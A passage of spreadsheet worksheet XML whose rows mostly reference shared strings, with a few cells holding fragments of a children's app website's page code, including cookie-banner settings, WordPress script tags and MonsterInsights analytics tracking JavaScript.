"","show_once":"10000","logging_on":"","as_popup":"","popup_overlay":"1","bar_heading_text":"","cookie_bar_as":"banner","popup_showagain_position":"bottom-right","widget_position":"left"};
var log_object = {"ajax_url":"https:\/\/storytoys.com\/wp-admin\/admin-ajax.php"};
/* ]]&gt; */ &lt;/script&gt; &lt;script type='text/javascript' src='https://storytoys.com/wp-content/uploads/siteground-optimizer-assets/cookie-law-info.min.js?ver=2.0.4' id='cookie-law-info-js'&gt;&lt;/script&gt; &lt;script type='text/javascript' src='https://storytoys.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.3.2' id='tp-tools-js'&gt;&lt;/script&gt; &lt;script type='text/javascript' src='https://storytoys.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.3.2' id='revmin-js'&gt;&lt;/script&gt;&lt;link rel="https://api.w.org/" href="https://storytoys.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://storytoys.com/wp-json/wp/v2/pages/1875" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://storytoys.com/xmlrpc.php?rsd" /&gt;&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://storytoys.com/wp-includes/wlwmanifest.xml" /&gt;&lt;meta name="generator" content="WordPress 6.2" /&gt;&lt;link rel='shortlink' href='https://storytoys.com/?p=1875' /&gt;&lt;link rel="alternate" type="application/json+oembed" href="https://storytoys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fstorytoys.com%2Fprivacy%2F" /&gt;&lt;link rel="alternate" type="text/xml+oembed" href="https://storytoys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fstorytoys.com%2Fprivacy%2F&amp;#038;format=xml" /&gt;&lt;meta</f>
        <v>0</v>
      </c>
    </row>
    <row r="8485" spans="1:2">
      <c r="A8485" t="s">
        <v>74</v>
      </c>
      <c r="B8485" t="s">
        <v>1977</v>
      </c>
    </row>
    <row r="8486" spans="1:2">
      <c r="A8486" t="s">
        <v>74</v>
      </c>
      <c r="B8486" t="s">
        <v>1978</v>
      </c>
    </row>
    <row r="8487" spans="1:2">
      <c r="A8487" t="s">
        <v>74</v>
      </c>
      <c r="B8487" t="s">
        <v>1979</v>
      </c>
    </row>
    <row r="8488" spans="1:2">
      <c r="A8488" t="s">
        <v>74</v>
      </c>
      <c r="B8488" t="s">
        <v>1980</v>
      </c>
    </row>
    <row r="8489" spans="1:2">
      <c r="A8489" t="s">
        <v>74</v>
      </c>
      <c r="B8489" t="s">
        <v>1981</v>
      </c>
    </row>
    <row r="8490" spans="1:2">
      <c r="A8490" t="s">
        <v>74</v>
      </c>
      <c r="B8490" t="s">
        <v>1982</v>
      </c>
    </row>
    <row r="8491" spans="1:2">
      <c r="A8491" t="s">
        <v>74</v>
      </c>
      <c r="B8491" t="s">
        <v>1983</v>
      </c>
    </row>
    <row r="8492" spans="1:2">
      <c r="A8492" t="s">
        <v>74</v>
      </c>
      <c r="B8492" t="s">
        <v>1984</v>
      </c>
    </row>
    <row r="8493" spans="1:2">
      <c r="A8493" t="s">
        <v>74</v>
      </c>
      <c r="B8493" t="s">
        <v>1985</v>
      </c>
    </row>
    <row r="8494" spans="1:2">
      <c r="A8494" t="s">
        <v>74</v>
      </c>
      <c r="B8494" t="s">
        <v>1986</v>
      </c>
    </row>
    <row r="8495" spans="1:2">
      <c r="A8495" t="s">
        <v>74</v>
      </c>
      <c r="B8495" t="s">
        <v>1987</v>
      </c>
    </row>
    <row r="8496" spans="1:2">
      <c r="A8496" t="s">
        <v>74</v>
      </c>
      <c r="B8496" t="s">
        <v>1988</v>
      </c>
    </row>
    <row r="8497" spans="1:2">
      <c r="A8497" t="s">
        <v>74</v>
      </c>
      <c r="B8497" t="s">
        <v>1989</v>
      </c>
    </row>
    <row r="8498" spans="1:2">
      <c r="A8498" t="s">
        <v>170</v>
      </c>
      <c r="B8498" t="s">
        <v>4209</v>
      </c>
    </row>
    <row r="8499" spans="1:2">
      <c r="A8499" t="s">
        <v>170</v>
      </c>
      <c r="B8499" t="s">
        <v>4210</v>
      </c>
    </row>
    <row r="8500" spans="1:2">
      <c r="A8500" t="s">
        <v>170</v>
      </c>
      <c r="B8500" t="s">
        <v>4211</v>
      </c>
    </row>
    <row r="8501" spans="1:2">
      <c r="A8501" t="s">
        <v>170</v>
      </c>
      <c r="B8501" t="s">
        <v>4212</v>
      </c>
    </row>
    <row r="8502" spans="1:2">
      <c r="A8502" t="s">
        <v>170</v>
      </c>
      <c r="B8502" t="s">
        <v>4213</v>
      </c>
    </row>
    <row r="8503" spans="1:2">
      <c r="A8503" t="s">
        <v>170</v>
      </c>
      <c r="B8503" t="s">
        <v>4214</v>
      </c>
    </row>
    <row r="8504" spans="1:2">
      <c r="A8504" t="s">
        <v>170</v>
      </c>
      <c r="B8504" t="s">
        <v>4215</v>
      </c>
    </row>
    <row r="8505" spans="1:2">
      <c r="A8505" t="s">
        <v>170</v>
      </c>
      <c r="B8505" t="s">
        <v>4216</v>
      </c>
    </row>
    <row r="8506" spans="1:2">
      <c r="A8506" t="s">
        <v>170</v>
      </c>
      <c r="B8506" t="s">
        <v>4217</v>
      </c>
    </row>
    <row r="8507" spans="1:2">
      <c r="A8507" t="s">
        <v>170</v>
      </c>
      <c r="B8507" t="s">
        <v>4218</v>
      </c>
    </row>
    <row r="8508" spans="1:2">
      <c r="A8508" t="s">
        <v>170</v>
      </c>
      <c r="B8508" t="s">
        <v>4219</v>
      </c>
    </row>
    <row r="8509" spans="1:2">
      <c r="A8509" t="s">
        <v>170</v>
      </c>
      <c r="B8509" t="s">
        <v>4220</v>
      </c>
    </row>
    <row r="8510" spans="1:2">
      <c r="A8510" t="s">
        <v>170</v>
      </c>
      <c r="B8510" t="s">
        <v>4221</v>
      </c>
    </row>
    <row r="8511" spans="1:2">
      <c r="A8511" t="s">
        <v>170</v>
      </c>
      <c r="B8511" t="s">
        <v>4222</v>
      </c>
    </row>
    <row r="8512" spans="1:2">
      <c r="A8512" t="s">
        <v>170</v>
      </c>
      <c r="B8512" t="s">
        <v>4223</v>
      </c>
    </row>
    <row r="8513" spans="1:2">
      <c r="A8513" t="s">
        <v>170</v>
      </c>
      <c r="B8513" t="s">
        <v>4224</v>
      </c>
    </row>
    <row r="8514" spans="1:2">
      <c r="A8514" t="s">
        <v>170</v>
      </c>
      <c r="B8514" t="s">
        <v>4225</v>
      </c>
    </row>
    <row r="8515" spans="1:2">
      <c r="A8515" t="s">
        <v>170</v>
      </c>
      <c r="B8515" t="s">
        <v>4226</v>
      </c>
    </row>
    <row r="8516" spans="1:2">
      <c r="A8516" t="s">
        <v>170</v>
      </c>
      <c r="B8516" t="s">
        <v>4227</v>
      </c>
    </row>
    <row r="8517" spans="1:2">
      <c r="A8517" t="s">
        <v>170</v>
      </c>
      <c r="B8517" t="s">
        <v>4228</v>
      </c>
    </row>
    <row r="8518" spans="1:2">
      <c r="A8518" t="s">
        <v>170</v>
      </c>
      <c r="B8518" t="s">
        <v>4229</v>
      </c>
    </row>
    <row r="8519" spans="1:2">
      <c r="A8519" t="s">
        <v>170</v>
      </c>
      <c r="B8519" t="s">
        <v>4230</v>
      </c>
    </row>
    <row r="8520" spans="1:2">
      <c r="A8520" t="s">
        <v>170</v>
      </c>
      <c r="B8520" t="s">
        <v>4231</v>
      </c>
    </row>
    <row r="8521" spans="1:2">
      <c r="A8521" t="s">
        <v>170</v>
      </c>
      <c r="B8521" t="s">
        <v>4232</v>
      </c>
    </row>
    <row r="8522" spans="1:2">
      <c r="A8522" t="s">
        <v>170</v>
      </c>
      <c r="B8522" t="s">
        <v>4233</v>
      </c>
    </row>
    <row r="8523" spans="1:2">
      <c r="A8523" t="s">
        <v>170</v>
      </c>
      <c r="B8523" t="s">
        <v>4234</v>
      </c>
    </row>
    <row r="8524" spans="1:2">
      <c r="A8524" t="s">
        <v>170</v>
      </c>
      <c r="B8524" t="s">
        <v>4235</v>
      </c>
    </row>
    <row r="8525" spans="1:2">
      <c r="A8525" t="s">
        <v>170</v>
      </c>
      <c r="B8525" t="s">
        <v>4236</v>
      </c>
    </row>
    <row r="8526" spans="1:2">
      <c r="A8526" t="s">
        <v>170</v>
      </c>
      <c r="B8526" t="s">
        <v>4237</v>
      </c>
    </row>
    <row r="8527" spans="1:2">
      <c r="A8527" t="s">
        <v>170</v>
      </c>
      <c r="B8527" t="s">
        <v>4238</v>
      </c>
    </row>
    <row r="8528" spans="1:2">
      <c r="A8528" t="s">
        <v>170</v>
      </c>
      <c r="B8528" t="s">
        <v>4239</v>
      </c>
    </row>
    <row r="8529" spans="1:2">
      <c r="A8529" t="s">
        <v>170</v>
      </c>
      <c r="B8529" t="s">
        <v>4240</v>
      </c>
    </row>
    <row r="8530" spans="1:2">
      <c r="A8530" t="s">
        <v>142</v>
      </c>
      <c r="B8530" t="s">
        <v>3624</v>
      </c>
    </row>
    <row r="8531" spans="1:2">
      <c r="A8531" t="s">
        <v>142</v>
      </c>
      <c r="B8531" t="s">
        <v>3625</v>
      </c>
    </row>
    <row r="8532" spans="1:2">
      <c r="A8532" t="s">
        <v>142</v>
      </c>
      <c r="B8532" t="s">
        <v>3626</v>
      </c>
    </row>
    <row r="8533" spans="1:2">
      <c r="A8533" t="s">
        <v>142</v>
      </c>
      <c r="B8533" t="s">
        <v>3627</v>
      </c>
    </row>
    <row r="8534" spans="1:2">
      <c r="A8534" t="s">
        <v>142</v>
      </c>
      <c r="B8534" t="s">
        <v>645</v>
      </c>
    </row>
    <row r="8535" spans="1:2">
      <c r="A8535" t="s">
        <v>142</v>
      </c>
      <c r="B8535" t="s">
        <v>722</v>
      </c>
    </row>
    <row r="8536" spans="1:2">
      <c r="A8536" t="s">
        <v>142</v>
      </c>
      <c r="B8536" t="s">
        <v>723</v>
      </c>
    </row>
    <row r="8537" spans="1:2">
      <c r="A8537" t="s">
        <v>142</v>
      </c>
      <c r="B8537" t="s">
        <v>724</v>
      </c>
    </row>
    <row r="8538" spans="1:2">
      <c r="A8538" t="s">
        <v>142</v>
      </c>
      <c r="B8538" t="s">
        <v>725</v>
      </c>
    </row>
    <row r="8539" spans="1:2">
      <c r="A8539" t="s">
        <v>142</v>
      </c>
      <c r="B8539" t="s">
        <v>726</v>
      </c>
    </row>
    <row r="8540" spans="1:2">
      <c r="A8540" t="s">
        <v>142</v>
      </c>
      <c r="B8540" t="s">
        <v>654</v>
      </c>
    </row>
    <row r="8541" spans="1:2">
      <c r="A8541" t="s">
        <v>142</v>
      </c>
      <c r="B8541" t="s">
        <v>655</v>
      </c>
    </row>
    <row r="8542" spans="1:2">
      <c r="A8542" t="s">
        <v>142</v>
      </c>
      <c r="B8542" t="s">
        <v>656</v>
      </c>
    </row>
    <row r="8543" spans="1:2">
      <c r="A8543" t="s">
        <v>142</v>
      </c>
      <c r="B8543" t="s">
        <v>727</v>
      </c>
    </row>
    <row r="8544" spans="1:2">
      <c r="A8544" t="s">
        <v>142</v>
      </c>
      <c r="B8544" t="s">
        <v>728</v>
      </c>
    </row>
    <row r="8545" spans="1:2">
      <c r="A8545" t="s">
        <v>142</v>
      </c>
      <c r="B8545" t="s">
        <v>729</v>
      </c>
    </row>
    <row r="8546" spans="1:2">
      <c r="A8546" t="s">
        <v>142</v>
      </c>
      <c r="B8546" t="s">
        <v>730</v>
      </c>
    </row>
    <row r="8547" spans="1:2">
      <c r="A8547" t="s">
        <v>142</v>
      </c>
      <c r="B8547" t="s">
        <v>731</v>
      </c>
    </row>
    <row r="8548" spans="1:2">
      <c r="A8548" t="s">
        <v>142</v>
      </c>
      <c r="B8548" t="s">
        <v>732</v>
      </c>
    </row>
    <row r="8549" spans="1:2">
      <c r="A8549" t="s">
        <v>142</v>
      </c>
      <c r="B8549" t="s">
        <v>733</v>
      </c>
    </row>
    <row r="8550" spans="1:2">
      <c r="A8550" t="s">
        <v>142</v>
      </c>
      <c r="B8550" t="s">
        <v>734</v>
      </c>
    </row>
    <row r="8551" spans="1:2">
      <c r="A8551" t="s">
        <v>142</v>
      </c>
      <c r="B8551" t="s">
        <v>735</v>
      </c>
    </row>
    <row r="8552" spans="1:2">
      <c r="A8552" t="s">
        <v>142</v>
      </c>
      <c r="B8552" t="s">
        <v>736</v>
      </c>
    </row>
    <row r="8553" spans="1:2">
      <c r="A8553" t="s">
        <v>142</v>
      </c>
      <c r="B8553" t="s">
        <v>3628</v>
      </c>
    </row>
    <row r="8554" spans="1:2">
      <c r="A8554" t="s">
        <v>142</v>
      </c>
      <c r="B8554" t="s">
        <v>3629</v>
      </c>
    </row>
    <row r="8555" spans="1:2">
      <c r="A8555" t="s">
        <v>142</v>
      </c>
      <c r="B8555" t="s">
        <v>3630</v>
      </c>
    </row>
    <row r="8556" spans="1:2">
      <c r="A8556" t="s">
        <v>142</v>
      </c>
      <c r="B8556" t="s">
        <v>3631</v>
      </c>
    </row>
    <row r="8557" spans="1:2">
      <c r="A8557" t="s">
        <v>142</v>
      </c>
      <c r="B8557" t="s">
        <v>3632</v>
      </c>
    </row>
    <row r="8558" spans="1:2">
      <c r="A8558" t="s">
        <v>142</v>
      </c>
      <c r="B8558" t="s">
        <v>3633</v>
      </c>
    </row>
    <row r="8559" spans="1:2">
      <c r="A8559" t="s">
        <v>142</v>
      </c>
      <c r="B8559" t="s">
        <v>3634</v>
      </c>
    </row>
    <row r="8560" spans="1:2">
      <c r="A8560" t="s">
        <v>142</v>
      </c>
      <c r="B8560" t="s">
        <v>3635</v>
      </c>
    </row>
    <row r="8561" spans="1:2">
      <c r="A8561" t="s">
        <v>142</v>
      </c>
      <c r="B8561" t="s">
        <v>3636</v>
      </c>
    </row>
    <row r="8562" spans="1:2">
      <c r="A8562" t="s">
        <v>170</v>
      </c>
      <c r="B8562" t="s">
        <v>4212</v>
      </c>
    </row>
    <row r="8563" spans="1:2">
      <c r="A8563" t="s">
        <v>170</v>
      </c>
      <c r="B8563" t="s">
        <v>4213</v>
      </c>
    </row>
    <row r="8564" spans="1:2">
      <c r="A8564" t="s">
        <v>170</v>
      </c>
      <c r="B8564" t="s">
        <v>4214</v>
      </c>
    </row>
    <row r="8565" spans="1:2">
      <c r="A8565" t="s">
        <v>170</v>
      </c>
      <c r="B8565" t="s">
        <v>4215</v>
      </c>
    </row>
    <row r="8566" spans="1:2">
      <c r="A8566" t="s">
        <v>170</v>
      </c>
      <c r="B8566" t="s">
        <v>4216</v>
      </c>
    </row>
    <row r="8567" spans="1:2">
      <c r="A8567" t="s">
        <v>170</v>
      </c>
      <c r="B8567" t="s">
        <v>4217</v>
      </c>
    </row>
    <row r="8568" spans="1:2">
      <c r="A8568" t="s">
        <v>170</v>
      </c>
      <c r="B8568" t="s">
        <v>4218</v>
      </c>
    </row>
    <row r="8569" spans="1:2">
      <c r="A8569" t="s">
        <v>170</v>
      </c>
      <c r="B8569" t="s">
        <v>4219</v>
      </c>
    </row>
    <row r="8570" spans="1:2">
      <c r="A8570" t="s">
        <v>170</v>
      </c>
      <c r="B8570" t="s">
        <v>4220</v>
      </c>
    </row>
    <row r="8571" spans="1:2">
      <c r="A8571" t="s">
        <v>170</v>
      </c>
      <c r="B8571" t="s">
        <v>4221</v>
      </c>
    </row>
    <row r="8572" spans="1:2">
      <c r="A8572" t="s">
        <v>170</v>
      </c>
      <c r="B8572" t="s">
        <v>4222</v>
      </c>
    </row>
    <row r="8573" spans="1:2">
      <c r="A8573" t="s">
        <v>170</v>
      </c>
      <c r="B8573" t="s">
        <v>4223</v>
      </c>
    </row>
    <row r="8574" spans="1:2">
      <c r="A8574" t="s">
        <v>170</v>
      </c>
      <c r="B8574" t="s">
        <v>4224</v>
      </c>
    </row>
    <row r="8575" spans="1:2">
      <c r="A8575" t="s">
        <v>170</v>
      </c>
      <c r="B8575" t="s">
        <v>4225</v>
      </c>
    </row>
    <row r="8576" spans="1:2">
      <c r="A8576" t="s">
        <v>170</v>
      </c>
      <c r="B8576" t="s">
        <v>4226</v>
      </c>
    </row>
    <row r="8577" spans="1:2">
      <c r="A8577" t="s">
        <v>170</v>
      </c>
      <c r="B8577" t="s">
        <v>4227</v>
      </c>
    </row>
    <row r="8578" spans="1:2">
      <c r="A8578" t="s">
        <v>170</v>
      </c>
      <c r="B8578" t="s">
        <v>4228</v>
      </c>
    </row>
    <row r="8579" spans="1:2">
      <c r="A8579" t="s">
        <v>170</v>
      </c>
      <c r="B8579" t="s">
        <v>4229</v>
      </c>
    </row>
    <row r="8580" spans="1:2">
      <c r="A8580" t="s">
        <v>170</v>
      </c>
      <c r="B8580" t="s">
        <v>4230</v>
      </c>
    </row>
    <row r="8581" spans="1:2">
      <c r="A8581" t="s">
        <v>170</v>
      </c>
      <c r="B8581" t="s">
        <v>4231</v>
      </c>
    </row>
    <row r="8582" spans="1:2">
      <c r="A8582" t="s">
        <v>170</v>
      </c>
      <c r="B8582" t="s">
        <v>4232</v>
      </c>
    </row>
    <row r="8583" spans="1:2">
      <c r="A8583" t="s">
        <v>170</v>
      </c>
      <c r="B8583" t="s">
        <v>4233</v>
      </c>
    </row>
    <row r="8584" spans="1:2">
      <c r="A8584" t="s">
        <v>170</v>
      </c>
      <c r="B8584" t="s">
        <v>4234</v>
      </c>
    </row>
    <row r="8585" spans="1:2">
      <c r="A8585" t="s">
        <v>170</v>
      </c>
      <c r="B8585" t="s">
        <v>4235</v>
      </c>
    </row>
    <row r="8586" spans="1:2">
      <c r="A8586" t="s">
        <v>170</v>
      </c>
      <c r="B8586" t="s">
        <v>4236</v>
      </c>
    </row>
    <row r="8587" spans="1:2">
      <c r="A8587" t="s">
        <v>170</v>
      </c>
      <c r="B8587" t="s">
        <v>4237</v>
      </c>
    </row>
    <row r="8588" spans="1:2">
      <c r="A8588" t="s">
        <v>170</v>
      </c>
      <c r="B8588" t="s">
        <v>4238</v>
      </c>
    </row>
    <row r="8589" spans="1:2">
      <c r="A8589" t="s">
        <v>170</v>
      </c>
      <c r="B8589" t="s">
        <v>4239</v>
      </c>
    </row>
    <row r="8590" spans="1:2">
      <c r="A8590" t="s">
        <v>170</v>
      </c>
      <c r="B8590" t="s">
        <v>4240</v>
      </c>
    </row>
    <row r="8591" spans="1:2">
      <c r="A8591" t="s">
        <v>171</v>
      </c>
      <c r="B8591" t="s">
        <v>4241</v>
      </c>
    </row>
    <row r="8592" spans="1:2">
      <c r="A8592" t="s">
        <v>171</v>
      </c>
      <c r="B8592" t="s">
        <v>4242</v>
      </c>
    </row>
    <row r="8593" spans="1:2">
      <c r="A8593" t="s">
        <v>171</v>
      </c>
      <c r="B8593" t="s">
        <v>4243</v>
      </c>
    </row>
    <row r="8594" spans="1:2">
      <c r="A8594" t="s">
        <v>171</v>
      </c>
      <c r="B8594" t="s">
        <v>4244</v>
      </c>
    </row>
    <row r="8595" spans="1:2">
      <c r="A8595" t="s">
        <v>172</v>
      </c>
      <c r="B8595" t="s">
        <v>4245</v>
      </c>
    </row>
    <row r="8596" spans="1:2">
      <c r="A8596" t="s">
        <v>172</v>
      </c>
      <c r="B8596" t="s">
        <v>4246</v>
      </c>
    </row>
    <row r="8597" spans="1:2">
      <c r="A8597" t="s">
        <v>172</v>
      </c>
      <c r="B8597" t="s">
        <v>4247</v>
      </c>
    </row>
    <row r="8598" spans="1:2">
      <c r="A8598" t="s">
        <v>172</v>
      </c>
      <c r="B8598" t="s">
        <v>4248</v>
      </c>
    </row>
    <row r="8599" spans="1:2">
      <c r="A8599" t="s">
        <v>172</v>
      </c>
      <c r="B8599" t="s">
        <v>4249</v>
      </c>
    </row>
    <row r="8600" spans="1:2">
      <c r="A8600" t="s">
        <v>172</v>
      </c>
      <c r="B8600">
        <f> name;
							if (typeof parameters['event_category'] ! == 'undefined') {
								hookName = parameters['event_category'] + ':' + name;
							}
							if (typeof MonsterInsightsDualTracker.trackers[hookName] ! == 'undefined') {
								MonsterInsightsDualTracker.trackers[hookName](parameters);
							} else {
								__gtagDataLayer('event', name, parameters);
							}
														parameters.send_to = monsterinsights_frontend.ua;
							__gtagDataLayer(type, name, parameters);
													} else {
							__gtagDataLayer.apply(null, arguments);
						}
					}
					__</f>
        <v>0</v>
      </c>
    </row>
    <row r="8601" spans="1:2">
      <c r="A8601" t="s">
        <v>172</v>
      </c>
      <c r="B8601" t="s">
        <v>4250</v>
      </c>
    </row>
    <row r="8602" spans="1:2">
      <c r="A8602" t="s">
        <v>172</v>
      </c>
      <c r="B8602" t="s">
        <v>4251</v>
      </c>
    </row>
    <row r="8603" spans="1:2">
      <c r="A8603" t="s">
        <v>172</v>
      </c>
      <c r="B8603">
        <f>= typeof arguments[3]) {
											hitObject = {
												'eventAction': arguments[3],
												'eventCategory': arguments[2],
												'eventLabel': arguments[4],
												'value': arguments[5] ? arguments[5] : 1,
											}
										}
									}
									if ('pageview' === arguments[1]) {
										if ('undefined' !</f>
        <v>0</v>
      </c>
    </row>
    <row r="8604" spans="1:2">
      <c r="A8604" t="s">
        <v>172</v>
      </c>
      <c r="B8604">
        <f>= typeof arguments[2]) {
											hitObject = {
												'eventAction': 'page_view',
												'page_path': arguments[2],
											}
										}
									}
									if (typeof arguments[2] === 'object') {
										hitObject = arguments[2];
									}
									if (typeof arguments[5] === 'object') {
										Object.assign(hitObject, arguments[5]);
									}
									if ('undefined' ! == typeof arguments[1].hitType) {
										hitObject = arguments[1];
										if ('pageview' === hitObject.hitType) {
											hitObject.eventAction = 'page_view';
										}
									}
									if (hitObject) {
										action = 'timing' === arguments[1].hitType ? 'timing_complete' : hitObject.eventAction;
										hitConverted = mapArgs(hitObject);
										__gtagTracker('event', action, hitConverted);
									}
								}
								return;
							}
							function mapArgs(args) {
								var arg, hit = {};
								var gaMap = {
									'eventCategory': 'event_category',
									'eventAction': 'event_action',
									'eventLabel': 'event_label',
									'eventValue': 'event_value',
									'nonInteraction': 'non_interaction',
									'timingCategory': 'event_category',
									'timingVar': 'name',
									'timingValue': 'value',
									'timingLabel': 'event_label',
									'page': 'page_path',
									'location': 'page_location',
									'title': 'page_title',
								};
								for (arg in args) {
																		if (!(!args.hasOwnProperty(arg) || !</f>
        <v>0</v>
      </c>
    </row>
    <row r="8605" spans="1:2">
      <c r="A8605" t="s">
        <v>172</v>
      </c>
      <c r="B8605" t="s">
        <v>4252</v>
      </c>
    </row>
    <row r="8606" spans="1:2">
      <c r="A8606" t="s">
        <v>172</v>
      </c>
      <c r="B8606" t="s">
        <v>4253</v>
      </c>
    </row>
    <row r="8607" spans="1:2">
      <c r="A8607" t="s">
        <v>172</v>
      </c>
      <c r="B8607" t="s">
        <v>4254</v>
      </c>
    </row>
    <row r="8608" spans="1:2">
      <c r="A8608" t="s">
        <v>172</v>
      </c>
      <c r="B8608" t="s">
        <v>261</v>
      </c>
    </row>
    <row r="8609" spans="1:2">
      <c r="A8609" t="s">
        <v>172</v>
      </c>
      <c r="B8609" t="s">
        <v>262</v>
      </c>
    </row>
    <row r="8610" spans="1:2">
      <c r="A8610" t="s">
        <v>172</v>
      </c>
      <c r="B8610" t="s">
        <v>263</v>
      </c>
    </row>
    <row r="8611" spans="1:2">
      <c r="A8611" t="s">
        <v>172</v>
      </c>
      <c r="B8611" t="s">
        <v>264</v>
      </c>
    </row>
    <row r="8612" spans="1:2">
      <c r="A8612" t="s">
        <v>172</v>
      </c>
      <c r="B8612" t="s">
        <v>265</v>
      </c>
    </row>
    <row r="8613" spans="1:2">
      <c r="A8613" t="s">
        <v>172</v>
      </c>
      <c r="B8613" t="s">
        <v>266</v>
      </c>
    </row>
    <row r="8614" spans="1:2">
      <c r="A8614" t="s">
        <v>172</v>
      </c>
      <c r="B8614" t="s">
        <v>267</v>
      </c>
    </row>
    <row r="8615" spans="1:2">
      <c r="A8615" t="s">
        <v>172</v>
      </c>
      <c r="B8615" t="s">
        <v>268</v>
      </c>
    </row>
    <row r="8616" spans="1:2">
      <c r="A8616" t="s">
        <v>172</v>
      </c>
      <c r="B8616" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="8617" spans="1:2">
      <c r="A8617" t="s">
        <v>172</v>
      </c>
      <c r="B8617" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="8618" spans="1:2">
      <c r="A8618" t="s">
        <v>172</v>
      </c>
      <c r="B8618" t="s">
        <v>271</v>
      </c>
    </row>
    <row r="8619" spans="1:2">
      <c r="A8619" t="s">
        <v>172</v>
      </c>
      <c r="B8619" t="s">
        <v>272</v>
      </c>
    </row>
    <row r="8620" spans="1:2">
      <c r="A8620" t="s">
        <v>172</v>
      </c>
      <c r="B8620" t="s">
        <v>273</v>
      </c>
    </row>
    <row r="8621" spans="1:2">
      <c r="A8621" t="s">
        <v>172</v>
      </c>
      <c r="B8621" t="s">
        <v>274</v>
      </c>
    </row>
    <row r="8622" spans="1:2">
      <c r="A8622" t="s">
        <v>172</v>
      </c>
      <c r="B8622" t="s">
        <v>275</v>
      </c>
    </row>
    <row r="8623" spans="1:2">
      <c r="A8623" t="s">
        <v>172</v>
      </c>
      <c r="B8623" t="s">
        <v>276</v>
      </c>
    </row>
    <row r="8624" spans="1:2">
      <c r="A8624" t="s">
        <v>172</v>
      </c>
      <c r="B8624" t="s">
        <v>277</v>
      </c>
    </row>
    <row r="8625" spans="1:2">
      <c r="A8625" t="s">
        <v>172</v>
      </c>
      <c r="B8625" t="s">
        <v>278</v>
      </c>
    </row>
    <row r="8626" spans="1:2">
      <c r="A8626" t="s">
        <v>172</v>
      </c>
      <c r="B8626" t="s">
        <v>279</v>
      </c>
    </row>
    <row r="8627" spans="1:2">
      <c r="A8627" t="s">
        <v>172</v>
      </c>
      <c r="B8627" t="s">
        <v>280</v>
      </c>
    </row>
    <row r="8628" spans="1:2">
      <c r="A8628" t="s">
        <v>172</v>
      </c>
      <c r="B8628" t="s">
        <v>4255</v>
      </c>
    </row>
    <row r="8629" spans="1:2">
      <c r="A8629" t="s">
        <v>172</v>
      </c>
      <c r="B8629" t="s">
        <v>4256</v>
      </c>
    </row>
    <row r="8630" spans="1:2">
      <c r="A8630" t="s">
        <v>11</v>
      </c>
      <c r="B8630" t="s">
        <v>4257</v>
      </c>
    </row>
    <row r="8631" spans="1:2">
      <c r="A8631" t="s">
        <v>11</v>
      </c>
      <c r="B8631" t="s">
        <v>4258</v>
      </c>
    </row>
    <row r="8632" spans="1:2">
      <c r="A8632" t="s">
        <v>11</v>
      </c>
      <c r="B8632" t="s">
        <v>4259</v>
      </c>
    </row>
    <row r="8633" spans="1:2">
      <c r="A8633" t="s">
        <v>11</v>
      </c>
      <c r="B8633" t="s">
        <v>4260</v>
      </c>
    </row>
    <row r="8634" spans="1:2">
      <c r="A8634" t="s">
        <v>11</v>
      </c>
      <c r="B8634" t="s">
        <v>4261</v>
      </c>
    </row>
    <row r="8635" spans="1:2">
      <c r="A8635" t="s">
        <v>11</v>
      </c>
      <c r="B8635" t="s">
        <v>4262</v>
      </c>
    </row>
    <row r="8636" spans="1:2">
      <c r="A8636" t="s">
        <v>11</v>
      </c>
      <c r="B8636" t="s">
        <v>4263</v>
      </c>
    </row>
    <row r="8637" spans="1:2">
      <c r="A8637" t="s">
        <v>11</v>
      </c>
      <c r="B8637" t="s">
        <v>4264</v>
      </c>
    </row>
    <row r="8638" spans="1:2">
      <c r="A8638" t="s">
        <v>11</v>
      </c>
      <c r="B8638" t="s">
        <v>4265</v>
      </c>
    </row>
    <row r="8639" spans="1:2">
      <c r="A8639" t="s">
        <v>11</v>
      </c>
      <c r="B8639" t="s">
        <v>4266</v>
      </c>
    </row>
    <row r="8640" spans="1:2">
      <c r="A8640" t="s">
        <v>11</v>
      </c>
      <c r="B8640" t="s">
        <v>4267</v>
      </c>
    </row>
    <row r="8641" spans="1:2">
      <c r="A8641" t="s">
        <v>11</v>
      </c>
      <c r="B8641" t="s">
        <v>4268</v>
      </c>
    </row>
    <row r="8642" spans="1:2">
      <c r="A8642" t="s">
        <v>11</v>
      </c>
      <c r="B8642" t="s">
        <v>4269</v>
      </c>
    </row>
    <row r="8643" spans="1:2">
      <c r="A8643" t="s">
        <v>11</v>
      </c>
      <c r="B8643" t="s">
        <v>4270</v>
      </c>
    </row>
    <row r="8644" spans="1:2">
      <c r="A8644" t="s">
        <v>11</v>
      </c>
      <c r="B8644" t="s">
        <v>4271</v>
      </c>
    </row>
    <row r="8645" spans="1:2">
      <c r="A8645" t="s">
        <v>11</v>
      </c>
      <c r="B8645" t="s">
        <v>4272</v>
      </c>
    </row>
    <row r="8646" spans="1:2">
      <c r="A8646" t="s">
        <v>11</v>
      </c>
      <c r="B8646" t="s">
        <v>4273</v>
      </c>
    </row>
    <row r="8647" spans="1:2">
      <c r="A8647" t="s">
        <v>11</v>
      </c>
      <c r="B8647" t="s">
        <v>4274</v>
      </c>
    </row>
    <row r="8648" spans="1:2">
      <c r="A8648" t="s">
        <v>11</v>
      </c>
      <c r="B8648" t="s">
        <v>4275</v>
      </c>
    </row>
    <row r="8649" spans="1:2">
      <c r="A8649" t="s">
        <v>11</v>
      </c>
      <c r="B8649" t="s">
        <v>4276</v>
      </c>
    </row>
    <row r="8650" spans="1:2">
      <c r="A8650" t="s">
        <v>11</v>
      </c>
      <c r="B8650" t="s">
        <v>4277</v>
      </c>
    </row>
    <row r="8651" spans="1:2">
      <c r="A8651" t="s">
        <v>11</v>
      </c>
      <c r="B8651" t="s">
        <v>4278</v>
      </c>
    </row>
    <row r="8652" spans="1:2">
      <c r="A8652" t="s">
        <v>11</v>
      </c>
      <c r="B8652" t="s">
        <v>4279</v>
      </c>
    </row>
    <row r="8653" spans="1:2">
      <c r="A8653" t="s">
        <v>11</v>
      </c>
      <c r="B8653" t="s">
        <v>4280</v>
      </c>
    </row>
    <row r="8654" spans="1:2">
      <c r="A8654" t="s">
        <v>11</v>
      </c>
